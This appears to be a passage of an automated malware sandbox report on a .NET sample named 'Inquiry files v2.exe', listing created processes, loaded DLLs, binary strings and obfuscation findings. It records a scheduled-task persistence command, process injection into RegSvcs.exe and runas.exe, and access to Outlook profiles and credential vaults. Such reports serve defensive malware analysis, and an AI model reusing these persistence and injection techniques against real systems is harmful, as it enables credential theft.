                Source: unknown | Process created: C:\Users\user\AppData\Roaming\WOzeoJQi.exe C:\Users\user\AppData\Roaming\WOzeoJQi.exe
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WOzeoJQi" /XML "C:\Users\user\AppData\Local\Temp\tmp5B3B.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe | Process created: C:\Windows\SysWOW64\runas.exe "C:\Windows\SysWOW64\runas.exe"
                Source: C:\Windows\SysWOW64\runas.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: version.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: slc.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: sspicli.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe  Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exe  Section loaded: sspicli.dll
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe  Section loaded: wininet.dll
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe  Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe  Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe  Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe  Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe  Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: credui.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: version.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\runas.exe  Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder  Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Windows\SysWOW64\runas.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: Inquiry files v2.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Inquiry files v2.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: runas.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2569895467.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000003.2507786781.000000000159B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3371819645.00000000003EE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3378759157.0000000003EEC000.00000004.80000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3375891934.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3028784720.0000000012D9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.2570230475.0000000001280000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2569861761.0000000004973000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2579072541.0000000004B29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.2570230475.0000000001280000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000002.3374868197.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2569861761.0000000004973000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000010.00000003.2579072541.0000000004B29000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3378759157.0000000003EEC000.00000004.80000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3375891934.00000000052FC000.00000004.10000000.00040000.00000000.sdmp, runas.exe, 00000010.00000002.3372111139.0000000003078000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000013.00000002.3028784720.0000000012D9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: runas.pdb source: RegSvcs.exe, 00000007.00000002.2569895467.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, YIJBuAgnqfKMtZ.exe, 0000000F.00000003.2507786781.000000000159B000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs  .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs  .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: 9.2.WOzeoJQi.exe.27bdc94.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs  .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                Source: Inquiry files v2.exe, Form1.cs  .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: WOzeoJQi.exe.0.dr, Form1.cs  .Net Code: InitializeComponent System.AppDomain.Load(byte[])
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, dXvfmhcjUU1IvInRn0.cs  .Net Code: Rn7eLE9MAq System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Code function: 0_2_076DB508 pushfd ; ret 0_2_076DB509
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Code function: 0_2_076DB4C3 push esp; ret 0_2_076DB4C9
                Source: C:\Users\user\Desktop\Inquiry files v2.exe  Code function: 0_2_076DBDB3 push eax; retf 0_2_076DBDB9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_00401851 push ds; iretd 7_2_00401871
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_00401A79 pushfd ; retf 7_2_00401A7D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_00401AE1 pushfd ; retf 7_2_00401AE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_004032A0 push eax; ret 7_2_004032A2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_0040BB36 push 8DDE865Dh; iretd 7_2_0040BB3E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_0042344F push edi; ret 7_2_0042345E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_00423453 push edi; ret 7_2_0042345E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_0041A505 push ebx; ret 7_2_0041A506
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_0040CD17 push es; iretd 7_2_0040CD1A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_00405E75 pushfd ; retf 7_2_00405E77
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_00401EC6 pushfd ; retf 7_2_00401EC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_0040CFC0 push edi; ret 7_2_0040CFC2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_004147EF push ebx; ret 7_2_004147F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_0128225F pushad ; ret 7_2_012827F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_012827FA pushad ; ret 7_2_012827F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_012B09AD push ecx; mov dword ptr [esp], ecx 7_2_012B09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_0128283D push eax; iretd 7_2_01282858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe  Code function: 7_2_0128135E push eax; iretd 7_2_01281369
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_04CBE271 push eax; mov dword ptr [esp], ecx 9_2_04CBE284
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06BEA6DA push es; retf 9_2_06BEA6F8
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06BEA65F push es; ret 9_2_06BEA660
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06BEA772 push es; iretd 9_2_06BEA794
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06BEA4AA push es; ret 9_2_06BEA570
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06BEA571 push es; ret 9_2_06BEA570
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06BEA571 push es; iretd 9_2_06BEA61C
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06BEB159 pushad ; retf 9_2_06BEB165
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06FCC110 push esp; retf 9_2_06FCC111
                Source: C:\Users\user\AppData\Roaming\WOzeoJQi.exe  Code function: 9_2_06FCC884 push 840986CFh; iretd 9_2_06FCC889
                Source: Inquiry files v2.exe  Static PE information: section name: .text entropy: 7.906017390992127
                Source: WOzeoJQi.exe.0.dr  Static PE information: section name: .text entropy: 7.906017390992127
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs  High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 0.2.Inquiry files v2.exe.2f9dc88.0.raw.unpack, cw37txoRO4X56hm21l.cs  High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs  High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                Source: 0.2.Inquiry files v2.exe.7630000.1.raw.unpack, cw37txoRO4X56hm21l.cs  High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, bHO0hVaBbLqHYB59vN.cs  High entropy of concatenated method names: 'rKBmjALhNf', 'IbImNQoH9D', 'ys3mL0tEKT', 'OkImEPeg1m', 'R8um5Fri3o', 'jrImC6uULc', 'YdtmA4Xtgm', 'LramqYqAoA', 'zRsm88v1Pv', 'ilHmUyipPq'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, IS9c3f3Pc2goW7gNg9.cs  High entropy of concatenated method names: 'yNxVYbrB1Y', 'DWNVXX6emK', 'ExXV3frbxO', 'DCcVrn7pSt', 'OTlVkWQHhL', 'MMIVf3VxF7', 'wh6V6FpN4w', 'FvCVDn0b5m', 't5oVTvDDoA', 'oHfVgZCi0G'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, AkZEqhH20Mevk819ESy.cs  High entropy of concatenated method names: 'fcAFjaBuJN', 'z7DFNiK7aF', 'JIDFLLENtv', 'lJZr3fMfsEkCnQ6wSe0', 'jPpsYNMt5pM02n3wQSI', 'mc5KGxMkHQXvmOZm6yo', 'N3sr3kM0NxojMlqrWc6', 'SeSSHYMzaoRxhsvvqXU'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, Y29iv6p02IJX0Cn699.cs  High entropy of concatenated method names: 'ToString', 'VFlsBH1e1D', 'haQsky0nRm', 'RamsfJwfj3', 'NNcs6X52oj', 'uQqsDAAy4s', 'sUdsTsBGMv', 'jHesgoy2N0', 'tJVsG7hPlg', 'bB9sa1Ycin'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, O1URIrqBHR6xNO4emT.cs  High entropy of concatenated method names: 'qRGP3hLtbv', 'PfePrALVlE', 'THpPp9pRC5', 'a8pPKfSCcD', 'KeJPt02pCp', 'he1PZbCJKD', 'o4XPvmoTJ7', 'PjRPQ5wCjZ', 'fTcPuaJtNS', 'CyXPI2IOJ0'
                Source: 0.2.Inquiry files v2.exe.8020000.3.raw.unpack, uhHchTPIVrb3N5Aibj.cs  High entropy of concatenated method names: 'Dispose', 'FRRHu0NgPP', 'JBk2kU5TZu', 'TbNhhvyy94', 'VL9HIxxqSC', 'kDIHziA5no', 'ProcessDialogKey', 'xdB2ONUvsH', 'Io32HqpAtj', 'L9222Bljwv'
